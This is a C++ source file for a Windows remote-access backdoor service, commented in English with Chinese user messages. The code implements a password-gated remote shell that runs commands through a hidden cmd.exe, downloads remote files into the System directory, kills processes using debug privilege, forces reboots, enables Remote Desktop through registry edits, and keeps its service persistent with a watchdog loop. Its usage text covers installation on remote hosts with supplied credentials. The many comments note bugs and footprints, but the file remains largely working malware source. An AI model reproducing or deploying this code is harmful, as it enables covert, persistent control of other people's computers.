📄 cmdbackdoor.cpp

	printf("\n\n");
	return ;
}

// Prints the command-line help (install/remove switches and examples) to stdout.
//   cain - accepted for interface compatibility; not used.
void Usage(char* cain)
{
	(void)cain;
	static const char *const help_lines[] = {
		"Attention:\n",
		"\tBe careful with this software, Good luck !\n\n",
		"Usage Show:\n",
		"\tEXENAME   -Install  [RemoteHost]  [Account]  [Password]\n",
		"\tEXENAME   -Remove   [RemoteHost]  [Account]  [Password]\n\n",
		"Example:\n",
		"\tEXENAME   -Install  (Install in the localhost)\n",
		"\tEXENAME   -Remove   (Remove  in the localhost)\n",
		"\tEXENAME   -Install  192.168.0.1  qfsl  123456  (Install in 192.168.0.1)\n",
		"\tEXENAME   -Remove   192.168.0.1  qfsl  123456  (Remove  in 192.168.0.1)\n",
	};
	for (size_t i = 0; i < sizeof help_lines / sizeof help_lines[0]; i++) {
		fputs(help_lines[i], stdout);
	}
}

// Per-connection worker thread of the remote shell. It asks the peer for a
// single password line, then treats every further line as either a built-in
// command (table below) or a command line to run through cmd.exe (sendcmd()).
//   lpParam - pointer to the accepted SOCKET; the socket is shut down and
//             closed here when the loop ends.
// Returns 0 after "exit", after recv() returns 0, or after a failed send().
// Relies on the file-scope line buffer `cmd` and the STARTINFO, HELPINFO,
// HELPINFO1, PASSWORD and BUFFER_SIZE definitions, all declared outside this
// listing.
DWORD WINAPI ThreadGetCmd( LPVOID lpParam )
{
	__try
	{
	SOCKET               ClientSocket=*(SOCKET *)lpParam;
	// temp is a 3-byte "erase one character" sequence {BS, <fill>, BS};
	// temp[1] is filled in at the point of use.
	char temp[3],recv_buff[1];temp[0]=8;temp[2]=8;
	// cmdnum counts accepted lines (0 = still at the password prompt);
	// tempint counts the bytes currently being swallowed after an ESC.
	int cmdnum = 0 ,tempint=0;
	send(ClientSocket,STARTINFO,strlen(STARTINFO),0);
	// NOTE: the length comes from a literal without the trailing space, so
	// one byte fewer than the message is transmitted.
	send(ClientSocket,"\n\r密码: ",strlen("\n\r密码:"),0);
	memset(cmd,0,1024);
	
	// One byte per recv(). Only a return of 0 (peer closed) ends the loop;
	// SOCKET_ERROR (-1) does not.
	while( recv(ClientSocket,recv_buff,1,0)!=0)
	{
		if (recv_buff[0]==8 ) 
		{
			// Backspace: erase the last typed character on the peer's side
			// (fill with ' ' while a line is pending, '>' otherwise).
			temp[1]= strlen(cmd)?' ':'>';
			if (strlen(cmd)) { send(ClientSocket,temp,3,0); cmd[strlen(cmd)-1] = 0;}
			continue;
		}
		else if (recv_buff[0]=='\n') 
		{
			if ((++cmdnum) ==1)
			{	
				// First completed line is the password. Only the first
				// strlen(PASSWORD) bytes of cmd are compared, so any line that
				// merely starts with PASSWORD is accepted as well.
				if(!memcmp(cmd,PASSWORD,strlen(PASSWORD))) 
					send(ClientSocket,"\n\r密码正确!祝你好运!  --qfsl\n\rCMD>",strlen("\n\r密码正确!祝你好运!  --qfsl\n\rCMD>"),0);
				else {cmdnum = 0; send(ClientSocket,"\n\r错误!\n\r密码:",strlen("\n\r错误!\n\r密码:"),0);}   // back to the password prompt
			}
			else
			{
				// Built-in command table (case-insensitive exact matches unless a
				// prefix memcmp is used). Anything unrecognised is passed to cmd.exe.
				if(!stricmp(cmd,"remove /y")) RemoveCmdService(NULL);   // RemoveCmdService() is declared outside this listing
				else if(!stricmp(cmd,"help") ||  !stricmp(cmd,"/?") || !stricmp(cmd,"/h")) 
					{send(ClientSocket,HELPINFO,strlen(HELPINFO),0);send(ClientSocket,HELPINFO1,strlen(HELPINFO1),0);}
				else if(!stricmp(cmd,"exit")) break;
				else if(!stricmp(cmd,"plist")) pslist(ClientSocket);
				else if(!stricmp(cmd,"ftp") || !memcmp(cmd,"ftp ",4) ) ;   // deliberately a no-op
				else if(!stricmp(cmd,"sysinfo")) sysinfo(ClientSocket);
				// "pkill<...>": strstr() yields NULL when the line holds no space,
				// and atoi(NULL) is undefined behaviour.
				else if(!memcmp(cmd,"pkill",5) && strlen(cmd)>6)	killps(atoi(strstr(cmd," ")),ClientSocket);
				else if(!memcmp(cmd,"http://",7))  downfile(cmd,ClientSocket); 
				else if(!stricmp(cmd,"Reboot /y")) RebootComputer(EWX_REBOOT | EWX_FORCE);
				else if(!stricmp(cmd,"shutdown /y")) RebootComputer(EWX_SHUTDOWN | EWX_FORCE);
				else if(!memcmp(cmd,"open3389",8))  Open3389(cmd,ClientSocket); 
				else {if(strlen(cmd)) sendcmd(cmd,ClientSocket);}

				send(ClientSocket,"\n\rCMD>",strlen("\n\rCMD>"),0);
			}
			memset(cmd,0,BUFFER_SIZE);
			continue ;
		}
		else
		{
			// ESC (27) starts a three-byte sequence (ESC + two bytes) that is dropped.
			if (recv_buff[0] ==27 || tempint ){ ++tempint; if (tempint>=3) tempint = 0;continue;}
			if(! (recv_buff[0] ==10 || recv_buff[0] == 8 || recv_buff[0] == 13 || recv_buff[0] ==27 || tempint ) ) 
			{
				// Append to the file-scope line buffer; no check against its
				// capacity (BUFFER_SIZE) is made here.
				cmd[strlen(cmd)]=recv_buff[0];
				// Echo '*' while at the password prompt, the byte itself afterwards.
				if(send(ClientSocket,cmdnum>0 ? recv_buff :"*",1,0)==SOCKET_ERROR) break;
			}
		}
		Sleep(10);
	}
	shutdown(ClientSocket,0x02);   // 0x02 == SD_BOTH
	closesocket(ClientSocket);
	cmdnum=0;   // local variable; has no further effect
	}//end try
	__finally {}
	return 0;
}
// "sysinfo" command: sends an estimated CPU clock and the total physical
// memory to the peer.
//   ClientSocket - connected peer socket; all output goes through send().
// The clock figure is the number of RDTSC ticks elapsed across a 1 s Sleep(),
// so it depends on scheduling accuracy rather than being a calibrated value.
void sysinfo(SOCKET ClientSocket)
{
	__try{
	unsigned __int64  m_start,m_overhead= 0;
	MEMORYSTATUS m;
	char temp[BUFFER_SIZE];

	send(ClientSocket,"\n\r测试中...",strlen("\n\r测试中..."),0);

	m_start = theCycleCount();
	Sleep(1000); 
	// ticks per second / 10^4 == hundredths of a MHz; split into MHz and
	// fraction in the sprintf below.
	unsigned cpuspeed100 = (unsigned)((theCycleCount()-m_start-m_overhead)/10000);
	sprintf(temp,"\n\rCPU 速度:\t %d.%d\t MHz", cpuspeed100/100,cpuspeed100-((cpuspeed100/100)*100));
	send(ClientSocket,temp,strlen(temp),0);

	GlobalMemoryStatus( &m);
	// Divides by 1,024,000 (not 1,048,576), so the "M" figure is approximate.
	sprintf(temp,"\n\r物理内存:\t %3.4f\t M", m.dwTotalPhys/(float)1024000);
	send(ClientSocket,temp,strlen(temp),0);
	}//end try
	__finally {}
}

// "plist" command: sends a tab-aligned table of running processes (image
// name, PID) built from a Toolhelp32 snapshot.
//   ClientSocket - connected peer socket.
// The table is accumulated with unbounded strcat() into a 2048-byte stack
// buffer; nothing is sent if the snapshot cannot be created.
void pslist(SOCKET ClientSocket)
{
	char buffer[2048];
	HANDLE			hProcessSnap		= NULL;
	PROCESSENTRY32	pe32				= {0};
	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == (HANDLE)-1) return ;   // (HANDLE)-1 == INVALID_HANDLE_VALUE
	memset(buffer,0,2048);
	strcat(buffer,"\r\n\t[EXE 文件名]\t\t\t\t\t\t[进程ID]\n\r\n\r");

	pe32.dwSize = sizeof(PROCESSENTRY32);
	if (Process32First(hProcessSnap, &pe32))
	{
		// Holds the decimal PID from itoa(): 4 digits plus the terminator.
		// Longer PIDs are written past the end of this array.
		char a[5];
		do
		{
			strcat(buffer,"\t");
			strcat(buffer,pe32.szExeFile);
			strcat(buffer,"\t\t");
			// Fewer padding tabs the longer the name (one tab per 8 columns),
			// so the PID column lines up; names of 40+ characters get none.
			if(strlen(pe32.szExeFile) / 8 ==0) strcat(buffer,"\t\t\t\t\t");
			if(strlen(pe32.szExeFile) / 8 ==1) strcat(buffer,"\t\t\t\t");
			if(strlen(pe32.szExeFile) / 8 ==2) strcat(buffer,"\t\t\t");
			if(strlen(pe32.szExeFile) / 8 ==3) strcat(buffer,"\t\t");
			if(strlen(pe32.szExeFile) / 8 ==4) strcat(buffer,"\t");
			itoa(pe32.th32ProcessID,a,10);
			strcat(buffer,a);
			strcat(buffer,"\n\r");
		}
		while (Process32Next(hProcessSnap, &pe32));
	}
	CloseHandle (hProcessSnap);
	send(ClientSocket,buffer,strlen(buffer),0);
	return;
}
// "pkill" command: enables SeDebugPrivilege on the current process token,
// opens the target with PROCESS_ALL_ACCESS and terminates it with exit code 1.
//   id           - PID parsed by the caller.
//   ClientSocket - peer socket receiving progress and error messages.
// Returns TRUE only when TerminateProcess() succeeded. Both handles are
// released in the __finally block; bRet is assigned but never used.
BOOL killps(DWORD id ,SOCKET ClientSocket)//kill-process helper
{
	HANDLE hProcess=NULL,hProcessToken=NULL;
	BOOL IsKilled=FALSE,bRet=FALSE;
	
	__try
	{
		if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
		{
			// NOTE: the length literal lacks the trailing '!', so one byte fewer is sent.
			send(ClientSocket,"\n\r操作指定进程失败!",strlen("\n\r操作指定进程失败"),0);
			__leave;
		}
		// SetPrivilege() is defined later in this file; failure is silent to the peer.
		if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))	__leave;

		send(ClientSocket,"\n\r设置权限...成功!",strlen("\n\r设置权限...成功!"),0);

		if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
		{
			send(ClientSocket,"\n\r操作指定进程失败!",strlen("\n\r操作指定进程失败!"),0);
			__leave;
		}
		if(!TerminateProcess(hProcess,1))
		{
			send(ClientSocket,"\n\r结束指定进程失败!",strlen("\n\r结束指定进程失败!"),0);
			__leave;
		}
		IsKilled=TRUE;
		// The length is taken from a different literal ("\n\t" vs "\n\r") of equal byte length.
		send(ClientSocket,"\n\r指定进程已结束!",strlen("\n\t指定进程已结束!"),0);
	}
	__finally
	{
		if(hProcessToken!=NULL) CloseHandle(hProcessToken);
		if(hProcess!=NULL) CloseHandle(hProcess);
	}
	return(IsKilled);
}

// Handles a line of the form "http://<url>-<name>": fetches <url> with
// URLDownloadToFile() (urlmon) into "<SystemDirectory>\<name>" and reports
// the outcome to the peer.
//   cmd          - the whole command line. It is split at the FIRST '-' it
//                  contains, so a URL that itself contains '-' is cut there.
//   ClientSocket - peer socket for status messages.
// Always returns true, including on format or download failure.
BOOL downfile(char* cmd,SOCKET ClientSocket)
{
	if(char *FileName=strstr(cmd,"-"))   // C++ declaration inside the condition
	{
		char url[200];//holds the URL part of the line
		memset(url,0,200);
		// Copies everything up to the byte before '-' (that byte, e.g. a
		// separating space, is dropped). No check against url's 200 bytes.
		memcpy(url,cmd,int(FileName-cmd-1));
		char fname[MAX_PATH];
		GetSystemDirectory(fname,MAX_PATH);
		FileName++;   // step past the '-' itself
		strcat(fname,"\\");
		strcat(fname,FileName);   // unbounded; the name is appended as received
		HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
		if(hRet==S_OK) 
		{
			send(ClientSocket,"\n\r下载文件成功!路径:",strlen("\n\r下载文件成功!路径:"),0);
			send(ClientSocket,fname,strlen(fname),0);
		}
		else 
			send(ClientSocket,"\n\r下载失败!",strlen("\n\r下载失败!"),0);
	}
	else send(ClientSocket,"\n\r输入格式错误!",strlen("\n\r输入格式错误!"),0);
	
	return true;
}

// Runs `cmd` as "<SystemDirectory>\cmd.exe /c <cmd>" with stdout and stderr
// redirected into an anonymous pipe, and streams the output to the peer while
// turning a bare '\n' into "\r\n".
//   cmd          - command text from the peer, appended to cmdline without a
//                  bounds check.
//   ClientSocket - peer socket that receives the output.
// Returns false if CreatePipe() or CreateProcess() fails, true otherwise.
// hRead, pi.hProcess and pi.hThread are never closed.
BOOL sendcmd(char* cmd,SOCKET ClientSocket)
{
	char         PrevChar;   // read in the loop below before it is ever assigned
	char cmdline[BUFFER_SIZE];
	char         szBuffer[BUFFER_SIZE];
	char         szBuffer2Send[BUFFER_SIZE+32];
	DWORD        dwBufferRead,dwBufferNow,dwBuffer2Send;
	SECURITY_ATTRIBUTES sa;//anonymous pipe that captures cmd's output; marked inheritable so the child can write to it
	HANDLE				hRead,hWrite;
	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
	sa.lpSecurityDescriptor = NULL;
	sa.bInheritHandle = TRUE;
	if (!CreatePipe(&hRead,&hWrite,&sa,0))  return false;
	STARTUPINFO			si;
	PROCESS_INFORMATION pi; 
	si.cb = sizeof(STARTUPINFO);
	GetStartupInfo(&si); 
	// Both child output streams go to the pipe's write end; hStdInput keeps
	// whatever GetStartupInfo() filled in.
	si.hStdError	= hWrite;
	si.hStdOutput	= hWrite;
	si.wShowWindow	= SW_HIDE;   // no visible console window
	si.dwFlags		= STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	memset(cmdline,0,BUFFER_SIZE);
	GetSystemDirectory(cmdline,MAX_PATH+1);   // size passed is MAX_PATH+1, unrelated to BUFFER_SIZE
	strcat(cmdline,"\\cmd.exe /c ");
	strcat(cmdline,cmd);
	// bInheritHandles=TRUE so the child gets hWrite; creation flags are 0 (passed as NULL).
	if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))  return false;
	CloseHandle(hWrite);   // drop the parent's write end so the pipe reports EOF once the child exits
	send(ClientSocket,"\n\r",2,0);  
	while(PeekNamedPipe(hRead,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL))
	{//peek at the pipe to learn how many bytes are available without consuming them
		if(dwBufferRead>0)
			ReadFile(hRead,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
			//now actually consume those bytes from the pipe
		else {Sleep(10); continue;}
		// Expand '\n' to "\r\n". NOTE: the '\r' is stored into szBuffer (the
		// source) rather than szBuffer2Send, so the output slot reserved for it
		// keeps whatever the buffer previously held.
		for(dwBufferNow=0,dwBuffer2Send=0;dwBufferNow<dwBufferRead;dwBufferNow++,dwBuffer2Send++)
		{
			if((szBuffer[dwBufferNow]=='\n') && (PrevChar!='\r'))							
				szBuffer[dwBuffer2Send++]='\r';
			PrevChar=szBuffer[dwBufferNow];
			szBuffer2Send[dwBuffer2Send]=szBuffer[dwBufferNow];
		}
		if(send(ClientSocket,szBuffer2Send,dwBuffer2Send,0)==SOCKET_ERROR)  
		{
			OutputDebugString("Send in ReadShell Error !\n");
			break;
		}
		Sleep(5);
	}//endwhile
	memset(szBuffer2Send,0,dwBuffer2Send);
	return true;
}
// Enables or disables one named privilege on an access token.
//   hToken           - token opened with at least TOKEN_ADJUST_PRIVILEGES
//                      (the caller in this listing passes TOKEN_ALL_ACCESS).
//   lpszPrivilege    - privilege name, e.g. SE_DEBUG_NAME.
//   bEnablePrivilege - TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears the attributes.
// Returns FALSE when the LUID lookup fails or GetLastError() is non-zero after
// AdjustTokenPrivileges() (typically ERROR_NOT_ALL_ASSIGNED when the token
// does not hold the privilege). The BOOL result of AdjustTokenPrivileges()
// itself is not examined.
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//adjust one token privilege
{
	TOKEN_PRIVILEGES tp;
	LUID luid;
	if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid)) return FALSE; 
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	if (bEnablePrivilege) tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	else
		tp.Privileges[0].Attributes = 0;

	AdjustTokenPrivileges(
		hToken, 
		FALSE, 
		&tp, 
		sizeof(TOKEN_PRIVILEGES), 
		(PTOKEN_PRIVILEGES) NULL, 
		(PDWORD) NULL); 
	if (GetLastError() != ERROR_SUCCESS)  return FALSE; 
	return TRUE;
}
// Reads the CPU timestamp counter: the two emitted bytes 0F 31 are the RDTSC
// opcode. There is no explicit return statement; the 64-bit result is
// whatever RDTSC left in EDX:EAX, which is MSVC's return convention for
// unsigned __int64 on 32-bit x86. Compiler- and target-specific.
inline unsigned __int64 theCycleCount(void)
{
	_asm _emit 0x0F
	_asm _emit 0x31 
}
// "open3389 [port]": turns on Terminal Services through the registry and sets
// the RDP-Tcp listening port (3389 when none or 0 is given).
//   cmd          - the command line; an optional port number follows the first space.
//   ClientSocket - peer socket for the result message.
// Registry writes (all under HKLM, through WriteReg()):
//   SYSTEM\CurrentControlSet\Control\Terminal Server : TSEnabled = 1
//   SYSTEM\CurrentControlSet\Services\TermService    : Start = 2 (auto-start)
//   ...\Terminal Server\WinStations\RDP-Tcp           : PortNumber = port
// These three value writes are the observable footprint of this command.
void Open3389(char* cmd ,SOCKET ClientSocket)
{
	char *FileName=strstr(cmd," ");
	unsigned long	port =0;
	if (FileName!=0)  port = atoi(FileName);   // atoi skips the leading space
	if (port==0 ) port=3389;
	int a=WriteReg(HKEY_LOCAL_MACHINE,
	"SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
	"TSEnabled",
	REG_DWORD, 
	NULL,
	1,0); 
	int b=WriteReg(HKEY_LOCAL_MACHINE,
	"SYSTEM\\CurrentControlSet\\Services\\TermService",
	"Start",
	REG_DWORD, 
	NULL,
	2,0); 
	int c=WriteReg(HKEY_LOCAL_MACHINE,
	"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
	"PortNumber",
	REG_DWORD, 
	NULL,
	port,0);
	// 50 bytes leaves little margin for the multi-byte message plus up to
	// ten port digits; the exact need depends on the source file's encoding.
	char temp[50];
	sprintf(temp,"\n\r成功修改TermService的注册表!端口:%d", port);
	if( a && b && c)
		send(ClientSocket,temp,strlen(temp),0);
	else
		send(ClientSocket,"\n\r修改TermService的注册表失败!",strlen("\n\r修改TermService的注册表失败!"),0);
} 

// Sets a single registry value.
//   MainKey - root key (every caller in this listing uses HKEY_LOCAL_MACHINE).
//   Subkey  - key path; created, or opened if creation fails, when mode == 0.
//   Vname   - value name.
//   type    - REG_SZ (data = szBuf, strlen(szBuf)+1 bytes) or REG_DWORD (data = dwData).
//   szBuf   - string payload for REG_SZ; ignored for other types.
//   dwData  - numeric payload for REG_DWORD; ignored for other types.
//   mode    - 0 opens/creates Subkey into hk; any other value skips that step
//             and leaves hk uninitialised (all callers here pass 0).
// Returns 1 on success, 0 on failure. The early returns skip RegCloseKey(hk).
int WriteReg(HKEY MainKey,LPCTSTR Subkey,LPCTSTR Vname,DWORD type, LPCTSTR  szBuf,DWORD dwData,int mode)
{
	HKEY hk; 
	__try{
	if(mode==0)
		// RegCreateKey returns ERROR_SUCCESS (0) on success; on any error fall back to opening.
		if ( RegCreateKey(MainKey,Subkey, &hk) ) {if (RegOpenKey(MainKey,Subkey, &hk)) return 0;}
	if(type==REG_SZ)
		if (RegSetValueEx(hk,             
                Vname,                     
                0,                         
                type,                    
                (LPBYTE) szBuf,           
                strlen(szBuf) + 1))  return 0;       
    if(type==REG_DWORD)
		if (RegSetValueEx(hk,             
                Vname,                    
                0,                        
                type,                     
                (LPBYTE) &dwData,         
                sizeof(DWORD)))   return 0;           
	RegCloseKey(hk); 
	}//end try
	__finally {}
	return 1;
}
// Enables SeShutdownPrivilege on the current process token and calls
// ExitWindowsEx(type, 0).
//   type - EWX_* flags; the callers in this listing pass EWX_REBOOT|EWX_FORCE
//          or EWX_SHUTDOWN|EWX_FORCE.
// No API result is checked and hToken is never closed.
void RebootComputer(int type)
{
	HANDLE hToken;
	TOKEN_PRIVILEGES tkp; 
	OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
	LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); 
	tkp.PrivilegeCount = 1;      
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
	AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); 
	ExitWindowsEx(type, 0);
	return;
}
// Watchdog thread: every 2 s it rewrites the service's Start (= 2, auto-start)
// and Description values under
// HKLM\SYSTEM\CurrentControlSet\Services\<szServiceName>, so the service
// configuration is restored if changed. The loop never exits normally.
//   lpParam - unused.
// Uses the file-scope szServiceName and szDisplayName, declared outside this
// listing. The repeated value writes are a persistence-maintenance pattern
// that registry auditing (e.g. Sysmon event 13) records on every iteration.
DWORD WINAPI ProtectSelf( LPVOID lpParam )
{
	// temp points at a string literal; strcat() then writes into that literal
	// (read-only data on modern toolchains), which is undefined behaviour.
	char* temp="SYSTEM\\CurrentControlSet\\Services\\";
	strcat(temp,szServiceName);
	__try
	{
		while(1)
		{
			WriteReg(HKEY_LOCAL_MACHINE,temp,"Start",REG_DWORD,NULL,2,0);
			// REG_SZ: szDisplayName is the string payload; the dwData slot is unused.
			WriteReg(HKEY_LOCAL_MACHINE,temp,"Description",REG_SZ,szDisplayName,NULL,0);
			Sleep(2000);
		}
	}
	__finally {}
	
	return 0;
}
